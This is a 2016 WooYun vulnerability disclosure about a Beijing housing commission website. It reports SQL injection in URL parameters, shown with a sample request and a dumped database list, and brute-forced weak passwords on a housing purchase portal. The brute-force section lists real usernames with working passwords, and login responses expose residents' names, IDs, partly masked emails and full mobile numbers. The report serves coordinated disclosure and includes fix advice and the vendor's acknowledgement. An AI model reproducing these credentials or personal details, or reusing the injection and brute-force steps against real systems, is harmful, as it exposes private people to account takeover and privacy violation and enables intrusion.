当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199421

漏洞标题:北京市住建委漏洞打包(主站两处注入\可爆破获取用户信息)

相关厂商:北京市住房和城乡建设委员会

漏洞作者: 路人甲

提交时间:2016-04-22 22:40

修复时间:2016-06-10 19:00

公开时间:2016-06-10 19:00

漏洞类型:应用配置错误

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-26: 厂商已经确认,细节仅向厂商公开
2016-05-06: 细节向核心白帽子及相关领域专家公开
2016-05-16: 细节向普通白帽子公开
2016-05-26: 细节向实习白帽子公开
2016-06-10: 细节向公众公开

简要描述:

再来一发

详细说明:

http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666


Contract_qyh和Contract_Password
两个参数存在注入
上一个是Contract_mf注入点,由于没有进一步测试,所以上次就发了一个,经过测试其他两个也存在注入

2222.png


3333.png


available databases [20]:
[*] application
[*] bjfdc
[*] bjfdc_for_auditburea
[*] bjfdc_tax
[*] bjhouse
[*] bjhouse_application
[*] bjrema
[*] datacenter
[*] figure
[*] jianceshi
[*] master
[*] model
[*] msdb
[*] policyhouse
[*] real_estate_analyse
[*] real_estate_analyse_bak
[*] real_estate_analyseImportdata
[*] tempdb
[*] ttib
[*] vk

漏洞证明:

http://**.**.**.**/enroll/home.jsp


自住型商品房网上申购系统,验证码没什么用,大量用户弱口令,仅测试top500用户名,密码采用
123456,111111,000000,用户名等

413	lirong	lirong	200	false	false	546	
352 zhangjing zhangjing 200 false false 547
159 wangning wangning 200 false false 549
329 wanglong wanglong 200 false false 551
379 liuyuying liuyuying 200 false false 551
478 zhangkun zhangkun 200 false false 551
76 wangyulan wangyulan 200 false false 553
400 zhanglijuan zhanglijuan 200 false false 553
404 liguixiang liguixiang 200 false false 554
270 wangshuzhen wangshuzhen 200 false false 557
173 zhangfengying zhangfengying 200 false false 559
1041 lixia 123456 200 false false 543
1312 lixiumei 123456 200 false false 552
686 chenfang 111111 200 false false 553
1943 wangjinfeng 000000 200 false false 556
1075 zhangguiying 123456 200 false false 560


1111.png


{"flag":1,"message":"登录成功!","data":{"id":"54016","people_name":"李蓉","username":"lirong","email":"287084850@**.**.**.**","mobile":"15510318399"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"12033","people_name":"张晶","username":"zhangjing","email":"6032561@**.**.**.**","mobile":"13801623808"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"46993","people_name":"王宁","username":"wangning","email":"casio0018@**.**.**.**","mobile":"13521143322"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"30169","people_name":"王龙","username":"wanglong","email":"wl_post@**.**.**.**","mobile":"13810447522"},"redirectUrl":null}

修复方案:

注入问题content_在内部可能还别的地方,多查看一下
第二个系统把验证码处理一下,另外提醒用户修改密码

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-26 18:50

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,并抄报北京分中心协助处置,由其后续协调网站管理单位处置。

最新状态:

暂无